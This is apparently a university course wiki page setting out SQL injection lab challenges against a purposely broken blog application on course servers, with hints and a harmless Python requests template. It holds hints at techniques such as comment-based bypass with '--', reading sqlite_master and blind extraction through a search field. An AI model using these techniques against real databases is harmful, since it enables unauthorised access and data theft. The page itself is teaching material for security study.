-
Notifications
You must be signed in to change notification settings - Fork 2
SQLi
The goal for this lab is to learn the basics of SQLi attacks.
SQL Injection (SQLi) is a vulnerability that may exist in applications that access databases. This vulnerability is present whenever the input provided by an attacker in not verified. This may lead to situations where the input is included in query strings and as a consequence the attacker may perform queries in the database. This code is usually written in the form of small (partial) SQL sentences.
Although simple, this vulnerability is very powerful as an attacker may dump all the information in a database.
To demonstrate these attacks we will use a purposely ill-developed blog application hosted in our website.
Remember, you should run these challenges inside a VM and you must be in the IST VPN in order to be able to play these challenges.
This problem is running at http://mustard.stt.rnl.tecnico.ulisboa.pt:12101
We will start with a simple problem of direct access to the database and will then move to more complex form of attacks.
Whenever looking for a SQLi we should first find the fields that are injectable.
- Can you find them?
- Ok, can you now login as the
adminand read his profile? Look for vulnerabilities in the login form.
Create your own user. DO NOT USE HERE A MEANINGFULL PASSWORD! THIS SITE IS COMPLETELY BROKEN!!!!
We heard that there is a lottery going on that might make you rich. Do you want to be rich? Get the JACKPOT! It is a different one for every player.
- But how come as your tokens are readonly?... It would be so much easier if we could just get more tokens...
- Oh, and by the way we know that you usually comment out the rest of the lines with
--to bypass some checks. Don't try it here. We are covered on this.
Are there any other interesting informations in this website? We have heard that there is a juicy secret blogpost yet to be released. Can you find it?
- Are there any other vulnerable input fields? Look for a place where you haven't tried to inject into yet.
- Oh, and it might be useful to have a look at
sqlite_master. Someone mentionedtbl_nameandsqlbut we have no clue of what this is.
This problem is running at http://mustard.stt.rnl.tecnico.ulisboa.pt:12102
The admin was in a hurry but he managed to fix the login and update profile problems! He just lacked the time to fix the search bar injection... but to prevent it from being exploited the admin just stopped showing the blog posts.
- Can you still exploit it?
- Is there any other information that can be extracted from the database?
-
requestspackage for Python might be useful for this challenge as you might need to do some scripting. Look at an example below and some more templates here
import requests
SERVER='http://mustard.stt.rnl.tecnico.ulisboa.pt:12102/'
#### GET REQUESTS
params = {'search' : 'lorem'}
headers = {'user-agent': 'my-app/0.0.1', 'Content-Type': 'application/json'}
r = requests.get(SERVER, params=params, headers=headers)
#### ANSWERS
print 'status : ', r.status_code
print 'headers : ', r.headers
print 'cookies : ', r.cookies
print 'html : ', r.textThis Task is just the case-sensitive version fo Task 2.1.
- Home
- SSof Scoreboard
- Virtual Machine Details
- Basic usage of tools
- Using Burp Suite as a Web Proxy (2019/20)
- gdb Basics
- Labs
- Still to be updated to current year
- Lab Extra - Reverse Enginneering (2018/19)